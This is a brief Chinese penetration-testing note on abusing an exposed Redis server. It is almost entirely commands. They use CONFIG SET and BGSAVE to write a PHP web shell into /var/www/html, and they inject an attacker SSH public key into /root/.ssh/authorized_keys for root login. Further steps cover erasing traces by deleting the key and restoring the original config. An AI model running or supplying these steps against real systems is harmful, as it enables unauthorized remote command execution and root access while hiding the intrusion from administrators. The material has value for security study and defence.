渗透测试笔记6-redis写shell

通过备份文件

写shell

1
2
3
4
5
6
7
CONFIG SET dir /var/www/html  

CONGIG SET dbfilename shell.php

SET shell "<?php system($_GET['cmd']);?>"

BGSAVE

清除痕迹

1)删除key
2)将dir和dbfilename更为原样
最好使用config get事先看看原来的值是啥。

通过ssh

生成密钥对

ssh-keygen -t rsa

生成一个临时文件

(echo -e “\n\n\n”; cat id_rsa.pub; echo -e “\n\n\n”) > pub.txt

连接redis并存储数据到redis上

cat pub.txt| redis-cli -h 192.168.2.155 -p 6379 -a 1q2w3e4r -x set gaia

设置目录,并保存文件

1
2
3
4
config set dir /root/.ssh/
config set dbfilename "authorized_keys"
save
exit

通过私钥连接登入服务器

ssh -i id_rsa root@192.168.2.155